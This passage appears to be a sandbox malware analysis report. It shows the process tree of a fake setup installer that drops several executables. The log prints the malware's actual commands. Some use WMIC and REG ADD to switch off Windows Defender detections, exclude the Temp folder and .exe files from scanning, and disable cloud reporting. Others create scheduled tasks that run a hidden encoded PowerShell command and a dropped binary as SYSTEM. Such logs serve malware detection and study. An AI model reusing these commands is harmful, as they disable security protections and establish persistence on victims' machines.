C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Users\Admin\AppData\Roaming\aciavihC:\Users\Admin\AppData\Roaming\aciavih2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\uviavihC:\Users\Admin\AppData\Roaming\uviavih2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\uviavihC:\Users\Admin\AppData\Roaming\uviavih3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exeC:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exeC:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exe --Task3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\aciavihC:\Users\Admin\AppData\Roaming\aciavih2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\uviavihC:\Users\Admin\AppData\Roaming\uviavih2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\uviavihC:\Users\Admin\AppData\Roaming\uviavih3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exeC:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exeC:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exe --Task3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exeC:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exeC:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exe --Task3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\aciavihC:\Users\Admin\AppData\Roaming\aciavih2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\uviavihC:\Users\Admin\AppData\Roaming\uviavih2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\uviavihC:\Users\Admin\AppData\Roaming\uviavih3⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll",OnpGSK2⤵
- Windows security modification
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exeC:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exeC:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exe --Task3⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed151f5e3fd2.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed151f5e3fd2.exeWed151f5e3fd2.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15228d911b9d5c.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15228d911b9d5c.exeWed15228d911b9d5c.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\wXZz5xY9daoSOnWFCSX4abIE.exe"C:\Users\Admin\Documents\wXZz5xY9daoSOnWFCSX4abIE.exe"6⤵
-
C:\Users\Admin\Documents\wXZz5xY9daoSOnWFCSX4abIE.exe"C:\Users\Admin\Documents\wXZz5xY9daoSOnWFCSX4abIE.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\J65PCCvPvS2ky_CNToWrf1HB.exe"C:\Users\Admin\Documents\J65PCCvPvS2ky_CNToWrf1HB.exe"6⤵
-
C:\Users\Admin\Documents\UI0J7Z_KJJDw3RhdaPcWQ3IG.exe"C:\Users\Admin\Documents\UI0J7Z_KJJDw3RhdaPcWQ3IG.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS1411.tmp\Install.exe.\Install.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS223A.tmp\Install.exe.\Install.exe /S /site_id "394347"8⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gvnIlyeBD" /SC once /ST 04:54:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gvnIlyeBD"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gvnIlyeBD"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 21:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\OOWUeMc.exe\" uG /site_id 394347 /S" /V1 /F9⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\9vdLMR_KRufvVeHAUGxsmK2M.exe"C:\Users\Admin\Documents\9vdLMR_KRufvVeHAUGxsmK2M.exe"6⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"7⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"7⤵
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffdac0b4f50,0x7ffdac0b4f60,0x7ffdac0b4f708⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1848 /prefetch:28⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1908 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1896 /prefetch:88⤵
- Suspicious behavior: EnumeratesProcesses
-
